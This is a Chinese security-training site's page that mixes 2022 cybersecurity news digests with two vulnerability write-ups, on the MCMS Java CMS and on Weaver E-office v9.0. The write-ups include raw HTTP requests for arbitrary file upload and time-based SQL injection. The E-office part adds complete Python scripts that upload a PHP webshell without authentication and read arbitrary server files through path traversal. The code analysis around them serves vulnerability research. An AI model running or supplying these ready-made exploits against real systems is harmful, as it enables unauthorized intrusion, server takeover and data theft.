网络安全日报 2022年10月09日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、LofyGang分发了约200个恶意NPM包来窃取信用卡数据
https://thehackernews.com/2022/10/lofygang-distributed-200-malicious-npm.html2、Facebook检测到400多个Android和iOS应用窃取用户登录凭据
https://thehackernews.com/2022/10/facebook-detects-400-android-and-ios.html3、BidenCash商店泄露超过120万张支付卡信息
https://blog.cyble.com/2022/10/07/bidencash-strikes-again-over-1-2-million-compromised-payment-cards-data-leaked/4、2K Games被盗的数据现已在网上出售
https://www.bleepingcomputer.com/news/security/2k-games-warns-users-their-stolen-data-is-now-up-for-sale-online/5、Avast发布适用于Hades勒索软件变种的免费解密器
https://www.bleepingcomputer.com/news/security/avast-releases-free-decryptor-for-hades-ransomware-variants/6、研究人员发现了一起针对埃及金融机构的黑客活动
https://securityaffairs.co/wordpress/136720/hacktivism/egypt-leaks-financial-data.html7、研究人员报告了Packagist PHP存储库中的供应链漏洞
https://thehackernews.com/2022/10/researchers-report-supply-chain.html8、Zimbra 未修补的 RCE 漏洞正在被黑客利用
https://www.bleepingcomputer.com/news/security/hackers-exploiting-unpatched-rce-bug-in-zimbra-collaboration-suite/9、FortiGate 和 FortiProxy 被曝存在新身份验证绕过漏洞
https://thehackernews.com/2022/10/fortinet-warns-of-new-auth-bypass-flaw.html10、VMware 修补了 vCenter Server 中的代码执行漏洞
https://www.securityweek.com/vmware-patches-code-execution-vulnerability-vcenter-server
网络安全日报 2022年10月08日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、微软发现ZINC黑客组织针对多国发起攻击活动
https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/ 2、新的Royal勒索软件勒索金额高达数百万美元
https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/ 3、Drupal更新补丁修复Twig模板引擎中的漏洞
https://www.securityweek.com/drupal-updates-patch-vulnerability-twig-template-engine 4、Swachh City平台遭受黑客攻击泄露1600万条用户记录
https://thehackernews.com/2022/09/swachh-city-platform-suffers-data.html 5、黑客利用Bitbucket Server漏洞进行攻击
https://www.bleepingcomputer.com/news/security/cisa-hackers-exploit-critical-bitbucket-server-flaw-in-attacks/ 6、微软确认新的Exchange零日漏洞被用于攻击
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-new-exchange-zero-days-are-used-in-attacks/ 7、BlackByte勒索软件通过驱动程序漏洞绕过安全产品
https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/ 8、研究人员发现Node.js中的HTTP请求走私漏洞
https://www.helpnetsecurity.com/2022/10/04/http-request-smuggling-vulnerability-cve-2022-35256-video/ 9、RansomEXX勒索软件团伙声称入侵法拉利公司并泄露内部文件
https://securityaffairs.co/wordpress/136571/data-breach/ferrari-alleged-data-breach.html 10、黑客从币安桥窃取了价值5.66亿美元的加密货币
https://www.bleepingcomputer.com/news/security/hacker-steals-566-million-worth-of-crypto-from-binance-bridge/
记一次MCMS的审计之路
MCMS 是 J2EE 系统,完整开源的Java CMS,基于SpringBoot 2架构,前端基于vue、element ui。为开发者提供上百套免费模板,同时提供适用的插件(文章、商城、微信、论坛、会员、评论、支付、积分、工作流、任务调度等...),一套简单好用的开源系统、一整套优质的开源生态内容体系。
十天前 MCMS 更新了新的一版本 5.2.9 提示新版本进行了 SQL 安全方面的优化,所以我们尝试 审计 https://gitee.com/mingSoft/MCMS/archive/refs/tags/5.2.8.zip
环境搭建
我们下载好安装包后
利用 idea 打开项目
创建数据库 mcms,导入 doc/mcms-5.2.8.sql
修改 src/main/resources/application-dev.yml 中关于数据库设置参数
运行MSApplication.java main方法
利用账户名:密码 msopen:msopen 登录后台 http://localhost:8080/ms/login.do
进入后台点击内容管理->静态化菜单 -> 生成主页、生成栏目、生成文章
启动的时候会有一点小 bug 需要在 idea 中配置
运行成功后,页面如图所示
前台反射型 XSS
漏洞复现
漏洞分析
我们看到运行后的控制台输出为
我们找到 net.mingsoft.basic.filter.XssHttpServletRequestWrapper 并添加断点,再次触发漏洞,看到一个完整的调用栈,
net.mingsoft.basic.filter.XssHttpServletRequestWrapper#clean(java.lang.String, java.lang.String)
后台命令执行一
漏洞复现
后台有一个可以上传模板文件的位置
我们上传文件并抓取数据包
我们看到数据包中的参数 uploadPath 指定了上传的位置,最后返回了上传后的路径以及文件内容
通过修改 参数 uploadPath 的值,我们就可以将文件上传 webapp 的任意目录下
我们写一个 1.txt 进行验证
POST /ms/file/uploadTemplate.do HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Length: 506
Accept: */*
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryz3nUf5Hws24R3B3A
Cookie:
Origin: http://localhost:8080
Referer: http://localhost:8080/ms/template/list.do?template=1/default
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
sec-ch-ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="uploadPath"
/
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="uploadFloderPath"
true
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="rename"
false
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/html
test
------WebKitFormBoundaryz3nUf5Hws24R3B3A--
漏洞分析
通过路由 /ms/file/uploadTemplate 定位到代码位置
net.mingsoft.basic.action.ManageFileAction#uploadTemplate
我们看到虽然存在非法路径过滤函数,查看函数内容,仅仅是对 ../ 进行了校验,通过绝对路径仍然可以绕过
net.mingsoft.basic.action.ManageFileAction#checkUploadPath
net.mingsoft.basic.action.BaseFileAction#uploadTemplate
后台命令执行二
漏洞复现
我们看到除了上传模板的接口,还存在编辑模板的接口
点击编辑,编辑后保存并抓取数据包
原本的数据包
我们看到参数 fileName 通过绝对路径指定了文件名,所以我们可以通过修改 fileName 来实现绝对路径写入
漏洞分析
net.mingsoft.basic.action.TemplateAction#writeFileContent
我们看到对文件的后缀名进行了检验,但还是通过传入的参数 fileName 写入文件
后台命令执行三
漏洞复现
构造数据包
POST /ms/file/upload.do HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Length: 506
Accept: */*
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryz3nUf5Hws24R3B3A
Cookie:
Origin: http://localhost:8080
Referer: http://localhost:8080/ms/template/list.do?template=1/default
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
sec-ch-ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="uploadPath"
/
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="uploadFloderPath"
true
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="rename"
false
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="file"; filename="3.txt"
Content-Type: text/html
test
------WebKitFormBoundaryz3nUf5Hws24R3B3A--
返回上传成功的文件的地址
漏洞分析
这个漏洞是在第一个后台命令执行的基础上发现的,两个类位于同一个文件内
net.mingsoft.basic.action.ManageFileAction#upload
虽然存在非法路径过滤函数 checkUploadPath ,查看函数内容,仅仅是对 ../ 进行了校验,通过绝对路径仍然可以绕过
对文件的上传是利用了
net.mingsoft.basic.action.BaseFileAction#upload
存在很多过滤,但是还是可以成功上传文件
后台 SQL 注入漏洞
漏洞复现
构造数据包
GET /ms/mdiy/page/verify.do?fieldName=1;select/**/if(substring((select/**/database()),1,4)='mcms',sleep(5),1)/**/and/**/1&fieldValue=1&id=1&idName=1 HTTP/1.1
Host: localhost:8080
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Cookie:
Pragma: no-cache
Referer: http://localhost:8080/ms/model/index.do?
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
sec-ch-ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
token: null
发现成功使得服务器沉睡五秒
漏洞分析
net.mingsoft.mdiy.action.PageAction#verify
获取参数并传到方法 validated
net.mingsoft.basic.action.BaseAction#validated(java.lang.String, java.lang.String, java.lang.String)
将 fieldName 和 fieldValue 的传入到 where 参数中
net.mingsoft.base.biz.impl.BaseBizImpl#queryBySQL(java.lang.String, java.util.List, java.util.Map)
net.mingsoft.base.dao.IBaseDao#queryBySQL
因为是 mybits 所以未采用预编译的 ${ 就容易产生注入
后台 SQL 注入二
漏洞复现
登录后台后我们找到自定义模型的位置
根据代码生成器 生成一个自定义模型 json 并导入保存
点击删除时 抓取数据包
修改modelTableName
发现成功使得服务器沉睡五秒
漏洞分析
net.mingsoft.mdiy.action.ModelAction#delete
net.mingsoft.base.biz.impl.BaseBizImpl#dropTable
net.mingsoft.base.dao.IBaseDao
查看dropTable对应的mapper内容如下,直接将table内容进行拼接且未预编译,造成SQL注入。
网络安全日报 2022年09月30日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、基于 Go 的恶意软件Chaos正快速扩张,针对Windows和Linux
https://securityaffairs.co/wordpress/136384/malware/chaos-malware-windows-linux.html 2、Drupal 更新补丁修复 Twig 模板引擎中的漏洞
https://www.securityweek.com/drupal-updates-patch-vulnerability-twig-template-engine 3、Prilex 恶意软件从针对 ATM 转为攻击PoS系统
https://securelist.com/prilex-atm-pos-malware-evolution/107551/ 4、研究人员发布Bl00dy勒索软件分析报告
https://blog.cyble.com/2022/09/28/bl00dy-new-ransomware-strain-active-in-the-wild/ 5、研究人员发现针对加密钱包的Doenerium窃密木马
https://blog.cyble.com/2022/09/28/new-information-stealer-targeting-crypto-wallets/ 6、Auth0警告某些源代码存储库可能已被泄露
https://www.bleepingcomputer.com/news/security/auth0-warns-that-some-source-code-repos-may-have-been-stolen/ 7、美国国税局警告美国纳税人遭受的短信网络钓鱼攻击大量增加
https://www.bleepingcomputer.com/news/security/irs-warns-americans-of-massive-rise-in-sms-phishing-attacks/ 8、L2 网络安全控制绕过漏洞影响多个思科产品
https://www.securityweek.com/l2-network-security-control-bypass-flaws-impact-multiple-cisco-products 9、微软将在一年内停用 Exchange Online 客户端访问规则
https://www.bleepingcomputer.com/news/microsoft/microsoft-to-retire-exchange-online-client-access-rules-in-a-year/ 10、微软在 Windows 11 22H2 中改进了网络钓鱼防护
https://www.theregister.com/2022/09/27/microsoft_phishing_password_protect_windows_11/
网络安全日报 2022年09月29日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、信标委发布《信息安全技术 网络安全众测服务要求》(征求意见稿)
https://www.freebuf.com/news/345854.html 2、澳大利亚在发生大规模数据泄露后将全面修订隐私法
https://www.cnbeta.com/articles/tech/1321095.htm 3、欧盟 ENISA 发布网络安全技能框架,以发展网络安全人才
https://www.secrss.com/articles/47399 4、Lazarus APT针对加密货币行业工作者发起网络钓鱼活动
https://thehackernews.com/2022/09/north-koreas-lazarus-hackers-targeting.html 5、谷歌发布Chrome 106 稳定版,修复多个高危严重漏洞
https://www.securityweek.com/chrome-106-patches-high-severity-vulnerabilities 6、Bl00dy 勒索软件团伙开始使用泄露的 LockBit 3.0 构建器进行攻击
https://securityaffairs.co/wordpress/136345/cyber-crime/bl00dy-ransomware-lockbit-3-encryptor.html 7、以太网 VLAN Stacking 漏洞可导致被DoS、MiTM 攻击
https://www.bleepingcomputer.com/news/security/ethernet-vlan-stacking-flaws-let-hackers-launch-dos-mitm-attacks/ 8、Java 模板引擎 Pebble 易受命令注入漏洞影响
https://portswigger.net/daily-swig/java-template-framework-pebble-vulnerable-to-command-injection 9、网络犯罪分子使用 Quantum Builder 来传递 Agent Tesla 恶意软件
https://securityaffairs.co/wordpress/136370/uncategorized/quantum-builder-agent-tesla-rat.html 10、Meta关闭了多个发布虚假信息的社交账户
https://www.bleepingcomputer.com/news/security/meta-dismantles-massive-russian-network-spoofing-western-news-sites/
E-office Server_v9.0 漏洞分析
漏洞简介
泛微e-office是一款标准化的协同OA办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。由于泛微 E-Office 未能正确处理上传模块中输入的数据,未授权的攻击者可以构造恶意数据包发送给服务器,实现任意文件上传,并且获得服务器的webshell,成功利用该漏洞可以获取服务器控制权。未授权的攻击者可以构造恶意的数据包,读取服务器上的任意文件
漏洞影响范围 E-office Server_v9.0
默认安装位置是 d:\eoffice 在虚拟机内安装没有 D 盘,所以安装位置是 c:\eoffice
安装完成后,服务默认在 8082 端口 通过主机名 或 ip 地址都可以访问到
代码位置在 C:\eoffice\webroot 同样代码也是被加密了的
通过免费的解密网站获得了加密的具体信息 ZEND加密PHP5.2版本 http://www.phpjm.cc/
利用工具进行批量的解密,因为工具点击一次只能进行一次解密,所以利用模拟点击的工具进行模拟点击 https://github.com/taojy123/KeymouseGo
任意文件上传漏洞
漏洞利用
/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.0.21.14:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryykJoMlQs3JMOsgi3
Content-Length: 175
------WebKitFormBoundaryykJoMlQs3JMOsgi3
Content-Disposition: form-data; name="Filedata"; filename="1.php"
<?php phpinfo();?>
------WebKitFormBoundaryykJoMlQs3JMOsgi3--
上传文件的地址 http://10.0.21.14:8082/images/logo/logo-eoffice.php
漏洞分析
漏洞的主要位于 general/index/UploadFile.php
通过 $_GET 方法获取的参数 m,调用 UploadFile 中的任意方法
我们选择其中的 uploadPicture 方法
没有对传入的文件进行过滤,如果传入一个 php 文件,命名为 1.php 最后上传文件会变为 logo-eoffice.php 传入的位置是$_SERVER['DOCUMENT_ROOT']."/images/logo/"
利用脚本
import sys
import requests
def request_shell(url):
targeturl = url + "/images/logo/logo-eoffice.php"
response = requests.get(targeturl)
if(response.status_code == 200):
print("获取 shell 成功,shell地址为:"+targeturl)
def request_upload(url,data):
targeturl = url + "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
targetfile = {'Filedata':('upload.php',data,'text/plain')}
response = requests.post(url = targeturl, files = targetfile)
if(response.status_code == 200):
print("上传成功")
def read_uploadfile(url,filename):
with open(filename) as f:
data = f.read()
request_upload(url,data)
def upload_file(url,filename):
if (filename == "phpinfo.php"):
data = "<?php phpinfo(); ?>"
request_upload(url,data)
else:
read_uploadfile(url,filename)
def main():
if len(sys.argv) < 3:
print("Usage: upload_file.py targeturl filename\n"
"Example: python upload_file.py http://10.0.21.14:8082 phpinfo.php")
exit()
url = sys.argv[1]
filename = sys.argv[2]
upload_file(url,filename)
request_shell(url)
if __name__ == '__main__':
main()
任意文件下载漏洞
漏洞利用
GET /inc/attach.php?path=/../../../../../1.txt HTTP/1.1
Host: 10.0.21.14:8082
Origin: http://10.0.21.14:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
漏洞分析
inc/attach.php
直接传入参数 $path 最后会读取 $path 的内容并将结果返回出来,我们注意到利用未授权就可将文件下载下来,从代码层面并没有看出来原因,但是通过浏览器直接访问时无法访问到,进行了 302 跳转,通过 burpsuite 就可以访问到,攥写脚本禁止 302 跳转也可以读取出来。
漏洞的主要来源位于
我们看一下文件的下载链接
利用脚本
import sys
import requests
import re
def save_reponse(re_result,filename):
filename=re.findall("[^/]+quot;,filename)[0]
# print(filename)
with open(filename, 'w',encoding='gb18030') as f:
f.write(re_result)
def re_response(response):
re_result = response[1507:]
return re_result
def read_file(url,filename):
targeturl = url + "/inc/attach.php?path="+filename
response = requests.get(url = targeturl, allow_redirects=False)
# print(response.text)
re_result = re_response(response.text)
print(re_result)
save_reponse(re_result,filename)
def main():
if len(sys.argv) < 3:
print("Usage: upload_file.py targeturl filename\n"
"Example: python read_file.py http://10.0.21.14:8082 attach.php")
exit()
url = sys.argv[1]
filename = sys.argv[2]
read_file(url,filename)
if __name__ == '__main__':
main()
还有一些 SQL 注入漏洞,还可以继续进一步的进行审计分析。
网络安全日报 2022年09月28日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、美国国防公司 Elbit Systems 披露数据泄露
https://securityaffairs.co/wordpress/136310/cyber-crime/elbit-systems-of-america-data-breach.html 2、WhatsApp 修复了两个严重远程代码执行漏洞
https://securityaffairs.co/wordpress/136300/hacking/whatsapp-critical-vulnerabilities.html 3、Erbium 信息窃取器通过破解软件和游戏外挂进行传播
https://securityaffairs.co/wordpress/136285/malware/erbium-info-stealing-malware.html 4、安全研究人员利用众包模式追踪神秘的 Metador APT
https://www.securityweek.com/researchers-crowdsourcing-effort-identify-mysterious-metador-apt 5、黑客利用PowerPoint文件中的鼠标移动触发恶意脚本
https://www.bleepingcomputer.com/news/security/hackers-use-powerpoint-files-for-mouseover-malware-delivery/ 6、Mozilla修复Firefox、Firefox ESR和Thunderbird中的高危漏洞
https://www.malwarebytes.com/blog/news/2022/09/update-firefox-and-thunderbird-now-mozilla-patches-several-high-risk-vulnerabilities 7、因儿童隐私数据保护问题,TikTok面临英国2700万英镑罚款
https://www.cnbeta.com/articles/tech/1320875.htm 8、美国警告借猴痘之名对公共卫生组织发起的网络钓鱼攻击
https://www.inforisktoday.com/hhs-hc3-warns-health-sector-monkeypox-phishing-schemes-a-20140 9、勒索团伙采取新策略,利用Exmatter工具损坏数据
https://securityaffairs.co/wordpress/136226/cyber-crime/exmatter-tool-shift-extortion-tactics.html 10、新的 NullMixer 恶意软件活动窃取用户的支付数据和凭证
https://thehackernews.com/2022/09/new-nullmixer-malware-campaign-stealing.html
网络安全日报 2022年09月27日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Lazarus组织使用BYOVD技术发起新的攻击活动
https://asec.ahnlab.com/en/38993/ 2、研究人员在谷歌Play商店发现伪装成应用程序的Harley木马
https://www.cysecurity.news/2022/09/harley-trojan-affecting-users-by.html 3、Netlify中的漏洞可能导致XSS、SSRF攻击
https://portswigger.net/daily-swig/netlify-vulnerable-to-xss-ssrf-attacks-via-cache-poisoning 4、加密货币交易所使用的npm包遭到泄露
https://www.bleepingcomputer.com/news/security/npm-packages-used-by-crypto-exchanges-compromised/ 5、Windows 11 Insider默认启用SMB身份验证速率限制器
https://www.bleepingcomputer.com/news/microsoft/windows-11-gets-better-protection-against-smb-brute-force-attacks/ 6、公安部网安局即日起开展“断号”行动,重拳打击整治网络账号黑产
https://www.ithome.com/0/642/722.htm 7、Meta被指控违法秘密跟踪iPhone用户
https://www.theregister.com/2022/09/23/meta_app_tracking/ 8、欧盟启动开放Web搜索项目,希望替代Google
https://www.secrss.com/articles/47327 9、研究人员发现新的针对IoT设备的恶意挖矿软件
https://www.cnbeta.com/articles/tech/1320439.htm 10、TargetCompany 勒索软件攻击针对微软 SQL 服务器
https://www.bleepingcomputer.com/news/security/microsoft-sql-servers-hacked-in-targetcompany-ransomware-attacks/
网络安全日报 2022年09月26日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、攻击者冒充 CircleCI 平台窃取GitHub 帐户
https://securityaffairs.co/wordpress/136211/hacking/phishing-circleci-github-accounts.html2、ISC 修复了 BIND DNS 软件中的六个高危漏洞
https://securityaffairs.co/wordpress/136164/security/bind-dns-software-flaws-2.html3、Sophos 警告防火墙产品中一个新的漏洞被黑客利用
https://securityaffairs.co/wordpress/136135/security/sophos-user-portal-webadmin-bug.html4、伦敦警方逮捕了涉嫌入侵Uber和Rockstar Games 的17岁少年
https://securityaffairs.co/wordpress/136146/cyber-crime/uber-rockstar-games-hacker-arrest.html5、匿名者(anonymous)声称入侵了俄罗斯国防部的网站
https://securityaffairs.co/wordpress/136127/hacktivism/anonymous-russian-ministry-of-defense.html6、InsydeH2O UEFI 固件中的高危漏洞影响数百万设备
https://www.securityweek.com/new-firmware-vulnerabilities-affecting-millions-devices-allow-persistent-access7、BlackCat勒索软件对其使用的数据泄露工具进行了更新
https://www.bleepingcomputer.com/news/security/blackcat-ransomware-s-data-exfiltration-tool-gets-an-upgrade/8、葡萄牙航空公司遭受勒索攻击后拒绝与黑客谈判
https://www.govinfosecurity.com/portuguese-airliner-vows-defiance-against-extortion-hackers-a-201349、Windows 11推出名为增强网络钓鱼防护的新功能
https://www.bleepingcomputer.com/news/microsoft/windows-11-now-warns-when-typing-your-password-in-notepad-websites/10、攻击者利用Magento漏洞发起新一轮攻击
https://www.bleepingcomputer.com/news/security/critical-magento-vulnerability-targeted-in-new-surge-of-attacks/
网络安全日报 2022年09月23日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Oracle 云基础设施漏洞暴露敏感数据
https://www.securityweek.com/oracle-cloud-infrastructure-vulnerability-exposed-sensitive-data 2、存在15年之久的Python "tarfile"模块漏洞影响超35万个项目
https://www.securityweek.com/15-year-old-python-vulnerability-present-350000-projects-resurrected 3、Confluence 漏洞 CVE-2022-26134 被恶意挖矿活动利用
https://securityaffairs.co/wordpress/136071/malware/atlassian-confluence-flaw-cryptomining.html 4、Lockbit 3.0勒索软件最新生成器在线泄漏
https://securityaffairs.co/wordpress/136056/data-breach/lockbit-3-0-builder-leak.html 5、Windows 11 22H2 将内核漏洞利用保护添加到安全基线
https://www.bleepingcomputer.com/news/microsoft/windows-11-22h2-adds-kernel-exploit-protection-to-security-baseline/ 6、Cobalt Strike 发布安全更新修复了XSS漏洞
https://www.techtarget.com/searchsecurity/news/252525204/Cobalt-Strike-gets-emergency-patch 7、澳大利亚电信公司Optus遭大规模网络攻击导致客户个人数据被盗
https://www.securityweek.com/australian-telecoms-firm-optus-discloses-breach-impacting-customer-data 8、过去一年中大约五分之二美国消费者的个人信息被盗、泄露或滥用
https://www.freebuf.com/news/345281.html 9、万代最新回应7月黑客入侵进展,不排除模玩部数据流失可能
https://hot.cnbeta.com/articles/game/1318869.htm 10、一黑客兜售印尼13亿手机卡用户数据,公开嘲讽多名高官
https://www.secrss.com/articles/47128
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动
